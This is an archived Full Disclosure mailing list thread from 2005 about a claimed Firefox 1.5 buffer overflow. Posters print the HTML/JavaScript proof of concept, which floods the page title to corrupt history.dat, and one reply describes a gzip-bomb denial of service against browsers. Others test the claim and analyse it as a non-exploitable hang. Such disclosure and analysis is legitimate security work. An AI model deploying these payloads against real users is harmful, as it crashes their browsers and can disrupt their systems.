Full Disclosure mailing list archives
Re: Firefox 1.5 buffer overflow (poc) - more buffer "overflows" waiting to be discovered
From: Fósforo <fosforo () gmail com>
Date: Fri, 9 Dec 2005 23:44:54 -0300
It works here. seems it depends on how much ram you've. i got 2 blue screens, after changed the code a bit. the first one was about MEMORY_MANAGEMENT and the second one was a PAGE_FAULT_IN_NONPAGED_AREA. And both occurs without user interaction, the second one i just've opened firefox, not the bug file (maybe cache ?) ps: i've 1Gb of ram <html><head><title>heh</title><script type="text/javascript"> function ex() { var buffer = ""; for (var i = 0; i < 5000; i++) { buffer += "A"; } var buffer2 = buffer; var buffer3 = buffer2; for (i = 0; i < 500; i++) { buffer2 += buffer; for (i = 0; i < 500; i++) { buffer3 += buffer2; } } document.title = buffer2; } </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME </a></body></html> 2006/1/31, ezdy <ezdy () mac com>:
and theres no reason for it to be working. first let's see what's going on - i loaded provided html in firefox and quitted it. even quitting firefox took a while, but only slightly longer than usual. after starting firefox again, it indeed didn't load, stuck in some kind of disk loop ignoring all macosx ui events. but not swapping. alright, that's strange: ezdy@devastace:~/Desktop/Firefox.app/Contents/MacOS$ ktrace ./firefox- bin ezdy@devastace:~/Desktop/Firefox.app/Contents/MacOS$ kdump -m 1 | tail -100 ... 7616 firefox-bin CALL read(0x18,0xcad9e00,0x1000) 7616 firefox-bin GIO fd 24 read 4096 bytes "0" 7616 firefox-bin RET read 4096/0x1000 7616 firefox-bin CALL read(0x18,0xcad9e00,0x1000) 7616 firefox-bin GIO fd 24 read 4096 bytes "0" 7616 firefox-bin RET read 4096/0x1000 7616 firefox-bin CALL lseek(0x18,0x21a000,0) 7616 firefox-bin RET lseek 0 7616 firefox-bin CALL read(0x18,0xcad9e00,0x1000) 7616 firefox-bin GIO fd 24 read 4096 bytes "0" 7616 firefox-bin RET read 4096/0x1000 7616 firefox-bin CALL read(0x18,0xcad9e00,0x1000) 7616 firefox-bin GIO fd 24 read 4096 bytes "\\" 7616 firefox-bin RET read 4096/0x1000 7616 firefox-bin CALL lseek(0x18,0x21c000,0) 7616 firefox-bin RET lseek 0 7616 firefox-bin CALL read(0x18,0xcad9e00,0x1000) 7616 firefox-bin GIO fd 24 read 4096 bytes "A" 7616 firefox-bin RET read 4096/0x1000 7616 firefox-bin CALL read(0x18,0xcad9e00,0x1000) 7616 firefox-bin GIO fd 24 read 4096 bytes "A" 7616 firefox-bin RET read 4096/0x1000 7616 firefox-bin CALL lseek(0x18,0x21e000,0) 7616 firefox-bin RET lseek 0 7616 firefox-bin CALL read(0x18,0xcad9e00,0x1000) this repeats virtually ad-infinitum until end of history.dat is reached. note that there is never allocated any memory-the same buffer is always used, thus no memory leak. firefox is stuck in loop (and eventually starts, since the string is finite, in my case about 30M) but it took way too longer to load. im not a windows user but since mac is only step away from it (you know apple, let's take win95 and freebsd and mix it together) my guess is it is the same situation of keeping main thread busy and events cannot be passed down, eventualy leading to "application is not responding" killbox. for Z1PL0CK: Don't stop, keep posting fake "buffer overflows" of #darknet trademonkeys (this one actually looked funny in the beggining). This time you made it to get /.ed which is not a bad start, but yo gonna fly higher! Because this bug got killed, i've something better for you: dd if=/dev/zero a 2GB file and gzip it. then just write a php script which sets content-encoding: gzip and fpassthru the file. safari rendered 1.2gb system unresponsible in 5 seconds, firefox in about 30. both crashed on "overflows" like this: Safari(233,0xa000ed68) malloc: *** vm_allocate(size=1250000896) failed (error code=3) Safari(233,0xa000ed68) malloc: *** error: can't allocate region Safari(233,0xa000ed68) malloc: *** set a breakpoint in szone_error to debug for those interested i can send coredumps now THATs SOME SERIOUSLY MAD warez (for those who wants to quickly pollute browser's heap with shellcode: yah, this is a good way). sheesh. is this some 'who invent a stupidier dos attack against browser' contest of some sort or what? On 8.12.2005, at 20:51, Matt wrote:Didn't work here, just made the system go a bit sluggish for a moment, as you would expect when dealing with a 2.5 million character string. Firefox : Mozilla/5.0 (X11; U; Linux i686; en-US; rv: 1.8) Gecko/20051130 Firefox/1.5 Built with : gcc version 3.4.4 (Gentoo 3.4.4-r1, ssp-3.4.4-1.0, pie-8.7.8) Window manager: KDE 3.5.0 Possibly it is crashing the Windows API ? -- Matt On 12/9/05, Ron <iago () valhallalegends com > wrote:I was also unable to replicate it, on Firefox 1.5 i386 Linux EN ad () heapoverflow com wrote:-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 nor a fake , nor you really dont know what is a buffer overflow,but forsure here on my firefox 1.5 EN, the client is much longuer toload tothe next boot but it reloads fine without exceptions and there is nothing about a security bug here...<!-- Firefox 1.5 buffer overflow Basically firefox logs all kinda of URL data in it's history.datfile,this little script will set a really large topic and Firefoxwill thensave that topic into it's history.dat.. The next time thatfirefox isopened, it will instantly crash due to a buffer overflow -- thiswillhappen everytime until you manually delete the history.dat file-- >whichmost users won't figure out. this proof of concept will only prevent someone from reopening their browser after being exploited. DoS if you will. however, code execution is possible with some modifcations. Tested with Firefox 1.5 on Windows XP SP2. ZIPLOCK <sickbeatz () gmail com> --> <html><head><title>heh</title><script type="text/javascript"> function ex() { var buffer = ""; for (var i = 0; i < 5000; i++) { buffer += "A"; } var buffer2 = buffer; for (i = 0; i < 500; i++) { buffer2 += buffer; } document.title = buffer2; } </script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME</a></body></html>-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ5g3Jq+LRXunxpxfAQIg5RAAsMXisNDN9AcLiWf9F7nsoKhT6uaULAw+ 4omnQUjuaRvxAIYRwKNC1nC+zl8qzmUsL4Extkd52mn7OkTrprd1MUE09CoshSlX Nq9N62bJ4zqRsdrum1NQhc358scTWNKCmWWXtSGNqu4fGnvpljyeYRACGeC6UD/v DDbikg09XOO+GffIAf4la63f+SV63+laZ6TkmX2jxBdw1LBN0mMCBLo0IPY5K78m /Cu2SCIqvs00ih6olLp9f8/3p9SgiK2+D9UiTnw3F3f2mYR5r7uGilYL9PNQPmKE crCnfKCYxi/4P03rnIuja9LNloQWkBTsOhOfe5716NlQ/KZAz/IpfTw7yS6sdn22 cxUpAE5zQqfI7jI0cD3yozmSksMyyEBLojAtsn2ECFOKpQQgkoOgaQX+dnrT+EYo pr2qquUKH/GXHGeT9od57cUkC/Jaf7qcaSkF6/LJ+13yHcsuDH0KcsMCYDP6aGN3 5R4/c6MAGFWKblMzdksWe+qqCDgm1yeM7MBbHGYyL6PMnfSldJBD29kGceLc47hi AVJaVmmDb3Nc/fo93gmqUT/x+mMItyk8+4dH0HOzEjRfI0qedeD+1uusS97ThVEw 2KG1o/1vlLPsnailmtHbj8sj/iawQvQRR/Phvk2Noz8bTQSEkDuThtE+zr2ZEjvb IFxjTMn8Sc0= =SX09 -----END PGP SIGNATURE-----_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
-- ---------------------------------------------- "O caminho do homem de bem é cercado de todos os lados pelas iniqüidades do egoísmo e tirania dos homens maus. Abençoados os que, em nome da caridade e boa vontade, conduzem os fracos pelo vale das sombras, pois ele é o guardião de seu irmão e o que encontra os filhos perdidos. E eu vou atacar com vingança e fúria os que tentarem envenenar e destruir meus irmãos. E quando minha vingança se abater sobre eles, saberão que eu sou o Senhor." (Ezequiel, 25, 17)
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- re: Firefox 1.5 buffer overflow (poc) ad () heapoverflow com (Dec 08)
- Re: re: Firefox 1.5 buffer overflow (poc) Ron (Dec 08)
- Re: re: Firefox 1.5 buffer overflow (poc) Matt (Dec 08)
- Re: Firefox 1.5 buffer overflow (poc) - more buffer "overflows" waiting to be discovered ezdy (Dec 08)
- Re: Firefox 1.5 buffer overflow (poc) - more buffer "overflows" waiting to be discovered Fósforo (Dec 09)
- Re: Firefox 1.5 buffer overflow (poc) - more buffer "overflows" waiting to be discovered Fósforo (Dec 09)
- Re: Firefox 1.5 buffer overflow (poc) - more buffer "overflows" waiting to be discovered Ron (Dec 09)
- Re: Firefox 1.5 buffer overflow (poc) - more buffer "overflows" waiting to be discovered ad () heapoverflow com (Dec 10)
- Re: re: Firefox 1.5 buffer overflow (poc) Matt (Dec 08)
- Re: re: Firefox 1.5 buffer overflow (poc) Ron (Dec 08)